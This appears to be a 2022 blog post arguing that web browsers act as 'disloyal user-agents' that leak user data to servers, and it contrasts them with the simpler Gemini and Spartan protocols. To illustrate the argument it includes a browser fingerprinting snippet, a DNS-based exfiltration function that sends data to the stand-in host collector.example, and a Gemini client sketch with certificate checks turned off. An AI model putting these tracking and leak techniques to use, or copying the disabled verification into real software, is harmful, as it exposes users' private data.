Disloyal User-Agents

Published: 2022-05-16

Updated: 2022-05-16

Tags: #rant #security #tech #web #browsers

Can a protocol control its User-Agents?

Much has been made, in the posts and discussions surrounding the design of the Gemini protocol, of limiting what user-agents can reveal about their user to servers. The general call to arms is "It's None of Your Damned Business!", which neatly sums up the mission statement of the Tor Browser and other privacy-centred browser plugins.

SolderPunk's Gemini Phlog

But despite all the lengths to which the Gemini protocol has gone, it is still technically possible for a nefarious user-agent and a malicious server to collaborate and share information about the user which the user would prefer to keep private.

I call user-agents which collaborate with servers in a way that goes against a user's interests "Disloyal User-Agents".

For reasons (outlined below) I doubt that Gemini clients will become disloyal user-agents, but there's nothing in principle preventing them.

The Many Betrayals of Disloyal User-Agents

The modern HTTP/HTML browser is objectively a Disloyal User-Agent. It didn't start out that way, but the evolution of browsers, and their modern default behaviour, is much more aligned with the needs of servers than with the needs of the users they represent.

Cookies are probably the pinnacle of disloyalty. The server and user-agent can tag a user, and then continuously exchange this information behind the user's back without notification or permission. I have yet to see a mainstream browser that allows explicit whitelisting of cookies as a core feature, something that was proposed in the original RFC outlining the Cookie headers.

RFC 2109: HTTP State Management Mechanism - PRIVACY
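
To make the tag-and-echo cycle concrete, here is a rough sketch (assuming Node 18+ with its built-in http module and global fetch); the port and the hand-rolled cookie jar, which stands in for a browser's automatic one, are purely illustrative:

```typescript
// A toy re-enactment of the cookie exchange: the server tags the first
// visitor with an ID, and the (disloyal) client stores the tag and attaches
// it to every later request without asking the user.
import * as http from "node:http";
import { randomUUID } from "node:crypto";

const server = http.createServer((req, res) => {
  const tag = req.headers.cookie;               // echoed back by the client
  if (tag) {
    res.end(`welcome back, ${tag}\n`);          // the user is recognised
  } else {
    const id = randomUUID();
    res.setHeader("Set-Cookie", `uid=${id}`);   // the tag
    res.end("hello, stranger\n");
  }
});

server.listen(8080, async () => {
  let jar = "";                                 // the client's cookie jar
  for (let i = 0; i < 2; i++) {
    const res = await fetch("http://localhost:8080/", {
      headers: jar ? { cookie: jar } : {},
    });
    const setCookie = res.headers.get("set-cookie");
    if (setCookie) jar = setCookie.split(";")[0];
    console.log(`client: "${(await res.text()).trim()}"`);
  }
  server.close();
});
```

Nothing in that loop asks the user whether the tag should be stored or sent again; a browser's default cookie handling makes the same choice on their behalf.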

Well documented are the many other headers which can be combined to identify the user, or at least put them in a small bucket of users. Again, these are added implicitly to outgoing requests without control given to the user. If you have never tried it, I highly recommend visiting the EFF's Panopticlick project to see how accurately you can be identified and tracked using information leaked by the disloyal user-agent (browser) you are using.

EFF Panopticlick Project
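
As a sketch of what that identification looks like from inside the page, the following browser-console snippet combines a handful of values the user-agent volunteers by default into a single hash; the choice of signals and the hashing step are illustrative only, not Panopticlick's actual method:

```typescript
// Combine a few freely offered browser properties into one opaque bucket ID.
async function fingerprint(): Promise<string> {
  const signals = [
    navigator.userAgent,                 // sent with every request anyway
    navigator.language,                  // mirrors the Accept-Language header
    `${screen.width}x${screen.height}x${screen.colorDepth}`,
    String(new Date().getTimezoneOffset()),
    String(navigator.hardwareConcurrency ?? ""),
  ].join("|");

  // Hash the combined string so the "bucket" is a single opaque token.
  const bytes = new TextEncoder().encode(signals);
  const digest = await crypto.subtle.digest("SHA-256", bytes);
  return Array.from(new Uint8Array(digest))
    .map((b) => b.toString(16).padStart(2, "0"))
    .join("");
}

fingerprint().then((id) => console.log("bucket:", id));
```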

Beyond the default behaviour leaking information, we also have to consider client-side execution of remote code. Whilst JavaScript has undoubtedly unleashed the power of the HTTP/HTML web, the only security model is the Same-Origin model, and it puts little if any control in the hands of users. Once again the privacy of a user is mostly governed by configuration sent by the server, which the user-agent faithfully follows. There's no way for a user to prevent a server from inspecting features via the web APIs (these should be whitelisted), and no way to prevent information leakage via DNS requests. Even pre-flight queries can transport information, which really limits the protections CORS can provide.
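
To illustrate the DNS point, here is a hypothetical sketch of what a script embedded in a page could do; collector.example and the encoding scheme are made up, and CORS never gets a chance to help because the lookup happens before any policy is applied:

```typescript
// Even when the page is never allowed to read the response, the request --
// and the DNS lookup for its hostname -- still leaves the machine.
function exfiltrate(secret: string): void {
  // Encode the data into a subdomain so the resolver (and the name server
  // for collector.example) sees it, whether or not the HTTP request succeeds.
  const label = btoa(secret).replace(/[^a-zA-Z0-9]/g, "").toLowerCase();
  const url = `https://${label}.collector.example/pixel.gif`;

  // "no-cors" requests skip the pre-flight and return an opaque response;
  // the page learns nothing, but the server has already received the data.
  void fetch(url, { mode: "no-cors" }).catch(() => {
    /* a network error changes nothing: the lookup was already made */
  });
}

exfiltrate("user-id-1234");
```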

The tragedy is that browser standardisation has gone a long way towards creating this situation. Standard headers, default web APIs, and default expected behaviour have been forced into user-agents with little to no recourse for users themselves.

Fostering good behaviour

The most trusted user-agent is the one you write yourself. One of the great

things about the Gemini and Spartan protocols, and the gemtext document type,

is that they are simple enough to quickly write a custom user-agent with which

to explore this new web of content.

A Tiny Bash Gemini Client

Laconia - A Simple Spartan Protocol Client
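
As an illustration of just how small such a user-agent can be, here is a minimal Gemini client sketch for Node; the example URL is a placeholder, certificate verification is simply switched off rather than doing proper TOFU, and error handling is omitted:

```typescript
// Gemini in a nutshell: open TLS to port 1965, send the URL, print the reply.
import * as tls from "node:tls";

const url = new URL(process.argv[2] ?? "gemini://example.org/");

const socket = tls.connect({
  host: url.hostname,
  port: 1965,
  rejectUnauthorized: false,          // no TOFU here -- just a sketch
});

socket.on("secureConnect", () => socket.write(`${url.href}\r\n`)); // the whole request
let response = "";
socket.on("data", (chunk) => (response += chunk.toString("utf8")));
socket.on("end", () => {
  const [header, ...body] = response.split("\r\n");
  console.log(`status: ${header}`);   // e.g. "20 text/gemini"
  console.log(body.join("\r\n"));
});
```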

A phenomenal number of user-agents will (hopefully) be produced for protocols and document types of this simplicity. This will in effect create choice and competition, in which users will (also hopefully) find user-agents that value their needs rather than those of the servers.

The small size of the community may also help, as bad-acting clients & servers can be publicly shamed and, hopefully, abandoned by users.

Can the HTTP/HTML browser ever be saved?

The constraint that a client should be simple enough for a wide selection of software developers to code is a large limiting factor on creating dynamic content and sophisticated internet applications. HTTP/HTML browsers are really amazing pieces of software and allow incredible experiences to be delivered to a user. But the chance of you or me building such a piece of software alone, or even in a small group, is now vanishingly small.

For this reason I don't think there's any hope of saving the HTTP/HTML web. It's simply too complex for new entrants; most new browsers just fork the Chromium project. Regulators around the world are trying to tackle this issue, but my prediction is that they cannot keep up with the speed and complexity of the tech and its evolving protocols.

Beyond Gemini & Spartan

Instead of starting with the protocol, what if we start with a framework for a "Loyal User-Agent"? What is the maximum level of complexity that a user can understand and configure to manage their privacy? What is the maximum level of complexity that a large number of software developers can reasonably be expected to tackle when creating a user-agent? Is it possible to deliver rich internet applications without centralised standards bodies?

I don't yet have answers to these questions, although I do have some nascent ideas forming.